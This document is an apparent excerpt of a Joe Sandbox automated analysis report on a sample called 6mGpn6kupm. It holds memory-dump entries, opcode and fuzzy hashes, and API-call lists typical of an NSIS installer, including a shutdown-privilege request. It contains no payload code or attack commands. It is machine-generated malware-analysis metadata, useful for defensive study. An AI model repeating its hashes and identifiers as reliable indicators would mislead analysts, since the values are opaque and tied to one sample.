                                                                                                              • Opcode ID: 72668813e89bc53c07730f155bf8a12dbae6d5bf2ea1ef79f44519163bfa628e
                                                                                                              • Instruction ID: fb15be6f6089bc995f5e9d3ebceaad7900cc254344c7d812326d3af7c1feafe8
                                                                                                              • Opcode Fuzzy Hash: 72668813e89bc53c07730f155bf8a12dbae6d5bf2ea1ef79f44519163bfa628e
                                                                                                              • Instruction Fuzzy Hash: AD01AD34800308EFDF048FA8D8086EABBB5EB9A312F505438DA1176260CB35989BDB64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84e2013926d7e30fcd91d2ff621162dcb61262db51f69817f371913867c73568
                                                                                                              • Instruction ID: cb1f0d4e962d801ba31a23de1dc2641863ec0bf5105989e748e4d1e443fcb229
                                                                                                              • Opcode Fuzzy Hash: 84e2013926d7e30fcd91d2ff621162dcb61262db51f69817f371913867c73568
                                                                                                              • Instruction Fuzzy Hash: D8012670E0C654AFCB019F64D9007AE7FB1FB8A320F00126AD81587681D7349445CBD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab81442cb195feffa02d29d0681476bbb1994f2e2f1182fc1758a4b83b1dcb11
                                                                                                              • Instruction ID: 1529786fa25a092b23fa110b7dbb989fb3b36a4e3c55fbc2bdae50b0bc863f1a
                                                                                                              • Opcode Fuzzy Hash: ab81442cb195feffa02d29d0681476bbb1994f2e2f1182fc1758a4b83b1dcb11
                                                                                                              • Instruction Fuzzy Hash: 71F03734D01208DFDB04DFA9D9446EDBBF5FB8A301F50946AC814B3251DB395915CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60acf2455b5dbf6cb433d9f0fc4a320ac4892d6e7ffcba59c3a498272a9eabcf
                                                                                                              • Instruction ID: ace151db85033612dfc7dd085ad9b1ad06b9df6d34b56f0627cad8460ac3b3ff
                                                                                                              • Opcode Fuzzy Hash: 60acf2455b5dbf6cb433d9f0fc4a320ac4892d6e7ffcba59c3a498272a9eabcf
                                                                                                              • Instruction Fuzzy Hash: 0CF0A471E08618EFDB109B64C9407AE7FB5FB89360F00852AD81597640DB74A4558BD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7c7edbbd4524dbdb4b1dba313240702b3a963e869c327e25b8bba0acc8391ee8
                                                                                                              • Instruction ID: b2fe5f351cc54244a2a960e918930d6907141acd83f1095a755225479534d274
                                                                                                              • Opcode Fuzzy Hash: 7c7edbbd4524dbdb4b1dba313240702b3a963e869c327e25b8bba0acc8391ee8
                                                                                                              • Instruction Fuzzy Hash: 97F0E9313083401FE30126794C10B7A7B6ADFC6690B4A40BAD502EB2A1DEE08C8147F2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5ac91e25a22e8166965d3beefcf72e6a06242ad5d0fcb002708c81096a153a79
                                                                                                              • Instruction ID: 6645ac89861b6a2d5bb4b7bc9560d583f4309fc5b6db87c14555ef9cb9586af1
                                                                                                              • Opcode Fuzzy Hash: 5ac91e25a22e8166965d3beefcf72e6a06242ad5d0fcb002708c81096a153a79
                                                                                                              • Instruction Fuzzy Hash: D7F0A02138030467F60462AD486477F26AA9BC5665F048436E505FB354DEE0DC8107F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 970dc871707b180ab4d2caded2ba85ea9d8c4bfe315d557fc48e5ad147fabeab
                                                                                                              • Instruction ID: 8c5b95898722cf059d6a835a91c31ab8bb30145a5ff07762d8b7eb385a18d2a0
                                                                                                              • Opcode Fuzzy Hash: 970dc871707b180ab4d2caded2ba85ea9d8c4bfe315d557fc48e5ad147fabeab
                                                                                                              • Instruction Fuzzy Hash: 25F09835459F829FE3016B30ACBC26A7FB0FF0B3137856D95E05AC6472DB694449CB15
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 022ab7e0a5d793ca0cb0eb9b2abebc11363fefb0ee3ab3d9a625903964e0a8f8
                                                                                                              • Instruction ID: 9bbe9c5b28e82ec80f7a9294276b40bb8ba0e58b1c8d358c2104115ea421deaf
                                                                                                              • Opcode Fuzzy Hash: 022ab7e0a5d793ca0cb0eb9b2abebc11363fefb0ee3ab3d9a625903964e0a8f8
                                                                                                              • Instruction Fuzzy Hash: 29F0A774D04304DFDB04DFB891456DD7BF1EB05301F5040AAC815D7691EB305E56DB04
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b3417339062a278a2a5d1930b33b5fbbba00a89d648aae05460f666ff9682696
                                                                                                              • Instruction ID: bee8c6504c4683a4070c0cc59ada22d4ef5218eec8148f41dfd62f34c675476f
                                                                                                              • Opcode Fuzzy Hash: b3417339062a278a2a5d1930b33b5fbbba00a89d648aae05460f666ff9682696
                                                                                                              • Instruction Fuzzy Hash: C8E01A75019F82EFE7012B60AC6C2BA7B74FB4B317B842C54E54E86062C7280040CB52
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: beb3208846dfd4ba99a68857a478861bd50f03ece9077a5d3e635c876aaf8407
                                                                                                              • Instruction ID: f3bb25f2c9535120925a178cb78ee925d5f6706ee5c97b0c37a476dc463eac74
                                                                                                              • Opcode Fuzzy Hash: beb3208846dfd4ba99a68857a478861bd50f03ece9077a5d3e635c876aaf8407
                                                                                                              • Instruction Fuzzy Hash: 8DE09231D553A64EC7039BB498144DDBF30ED93310B8642E7D050AB052EB30194DC7A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9887ceff69479d9622acb012b455ae21970e36b43eac40e2395c27da2705e11a
                                                                                                              • Instruction ID: 3ab9b40378af82d84272a692d2d2c1f99cbd4a3b0cbff389ea190a6ec04d1454
                                                                                                              • Opcode Fuzzy Hash: 9887ceff69479d9622acb012b455ae21970e36b43eac40e2395c27da2705e11a
                                                                                                              • Instruction Fuzzy Hash: 1EE0ED74D04208DBDB04DFB9D54969DBBB5EB49301F6045A99814A7250EB305A56DB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb28cfb1ecb3940da290c86c0b7f73652fda05de1fb9e238d835e7b2653918bf
                                                                                                              • Instruction ID: 39aa15d827feee91bd2e024aa9734c7ed244567c160e7d1039f76898922b22f3
                                                                                                              • Opcode Fuzzy Hash: fb28cfb1ecb3940da290c86c0b7f73652fda05de1fb9e238d835e7b2653918bf
                                                                                                              • Instruction Fuzzy Hash: 7EE0C274809349EFDB108B6495196A5BB78A703302F0410EAC419A3192D7700D19D786
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dccbf6471b13cae43cf124905078691a42042151d0b8dd5b66b45fc65cba7c96
                                                                                                              • Instruction ID: 7575c555999c5751dd42c298764ec0471084e92922679b7c8193e70e1e0ea7b7
                                                                                                              • Opcode Fuzzy Hash: dccbf6471b13cae43cf124905078691a42042151d0b8dd5b66b45fc65cba7c96
                                                                                                              • Instruction Fuzzy Hash: B8D01231D6022A978B01AAA5DC044DEBB39FE95721B914666D51437140EB70265986E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7a5a7f890870e7421ea45665f3c59baf25d35af01e37060786b93e3d55f67057
                                                                                                              • Instruction ID: dda1e80703683a4320ea20ca0f1c2fd28353a2f654c40c34cacbfb83f6729e42
                                                                                                              • Opcode Fuzzy Hash: 7a5a7f890870e7421ea45665f3c59baf25d35af01e37060786b93e3d55f67057
                                                                                                              • Instruction Fuzzy Hash: 9FE0C23500C3884FDB13E734ACA56C93B326B81204F048699D4491BABADEB4068BCF66
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                              • Instruction ID: 9968b1f7b0fc0b7bf7e049fa17098cae9ca96013ffba795bad1e7fd54a298b3b
                                                                                                              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                              • Instruction Fuzzy Hash: F4C0123310C1286A9224504E7C469A3A74CC2C13B5A210177F93D8724054425C4411B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 62ba96968ae992a85bb41166079ac3b30a5364ab6aa298426466bc7b715725e7
                                                                                                              • Instruction ID: 8a91f5611efdcaba00c8e754bd3bc16f6b8f62d92593354dfa799b72d06c6690
                                                                                                              • Opcode Fuzzy Hash: 62ba96968ae992a85bb41166079ac3b30a5364ab6aa298426466bc7b715725e7
                                                                                                              • Instruction Fuzzy Hash: 6BD0673AB000089FCB149F98EC809DDF776FB9C221B548116E915A3260C7319965DB64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b0b48356a68114e0e06b45667b529d755c0be2c535fb61d7e169ad990e710aa5
                                                                                                              • Instruction ID: 1795774a212541c18ef941d4939278a75b21674efc14d974d8a32bbd7de2572e
                                                                                                              • Opcode Fuzzy Hash: b0b48356a68114e0e06b45667b529d755c0be2c535fb61d7e169ad990e710aa5
                                                                                                              • Instruction Fuzzy Hash: 89D0A72110E7E02FDB038228782449D6FF10C8752034946E7E098EB1E695C50A8B438B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2c4ded1e4d633b79872bf532f53b000c3482179e8a45ad00a2b00b864526e258
                                                                                                              • Instruction ID: 06c6284d9402ad46b00e5469559736b08397606b4ca11bafc80edafd10c42af8
                                                                                                              • Opcode Fuzzy Hash: 2c4ded1e4d633b79872bf532f53b000c3482179e8a45ad00a2b00b864526e258
                                                                                                              • Instruction Fuzzy Hash: 3BD0223080030CEFC300DFA4D809BA9B77CE703303F0000AC980863290CBB00D10CB88
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 77774d93467abd26ac2073ec4cd6395b46dd4d59b899cbb321e1958dbdf2faec
                                                                                                              • Instruction ID: ef2c4bdce441b6675027c3d1e26c03da594212f1f4f4034c567ff757d4aaf00a
                                                                                                              • Opcode Fuzzy Hash: 77774d93467abd26ac2073ec4cd6395b46dd4d59b899cbb321e1958dbdf2faec
                                                                                                              • Instruction Fuzzy Hash: 54C01232645610176614A21CB85069E56A58DC9621710C936E415B71144DD05987419A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b3bb0f1178f1015699d4e0925331edc3285632ed35da0b65c93b195f717f8d13
                                                                                                              • Instruction ID: 36485d921da259cd0115ca0a6720736dae4ce1cbed2922bd6c059dfbbe5d6d81
                                                                                                              • Opcode Fuzzy Hash: b3bb0f1178f1015699d4e0925331edc3285632ed35da0b65c93b195f717f8d13
                                                                                                              • Instruction Fuzzy Hash: 11C08C78001F0A9BF2042F50BC0CB39B7B8B747313FC82D10E51C028708BB85424CA48
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3397584c17d3773af3f9f3a1de6b8af69a8a1e32487263f61302f8cf0b8c9aff
                                                                                                              • Instruction ID: 30474ce32e61be8715c1a9c47416ed0fe5cfd715b77a88805de72bc80cc3b7bc
                                                                                                              • Opcode Fuzzy Hash: 3397584c17d3773af3f9f3a1de6b8af69a8a1e32487263f61302f8cf0b8c9aff
                                                                                                              • Instruction Fuzzy Hash: F1C0123001430C4BE501F769EC46755332A6780500780D510A0091697ADFF419CB8FE9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74a6731e5a2ec55f7c44ee04855a12fe9267dd31da0a0f87bb9911ad1ab19415
                                                                                                              • Instruction ID: f43b0011f90fca0208173ede20e75e9fefb8273c8cd69682f9867565c42efb81
                                                                                                              • Opcode Fuzzy Hash: 74a6731e5a2ec55f7c44ee04855a12fe9267dd31da0a0f87bb9911ad1ab19415
                                                                                                              • Instruction Fuzzy Hash: 4EC04C312687089FF340AA5DD994B5537ECFF86B04F5098E1F5189B665CA62FC404A49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537695596.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_150000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6bdc4858fc1072283808878a57d25aea3cd95f46b24b3d11b6eefe11f6ca5f1e
                                                                                                              • Instruction ID: 439ca338ea5479dfc3bd3ddb0f4171cefd1b511e8656cbb785a1bf2b670f00d3
                                                                                                              • Opcode Fuzzy Hash: 6bdc4858fc1072283808878a57d25aea3cd95f46b24b3d11b6eefe11f6ca5f1e
                                                                                                              • Instruction Fuzzy Hash: 15A022383000008BC208EB08E200C0FF3833FE0300B00C02C0000820E08830CC008022
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                              • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                              • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                              • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                              • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                              • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                              • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                              • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                              • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                              • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                              • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                              • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                              • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3441113951-334447862
                                                                                                              • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                              • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
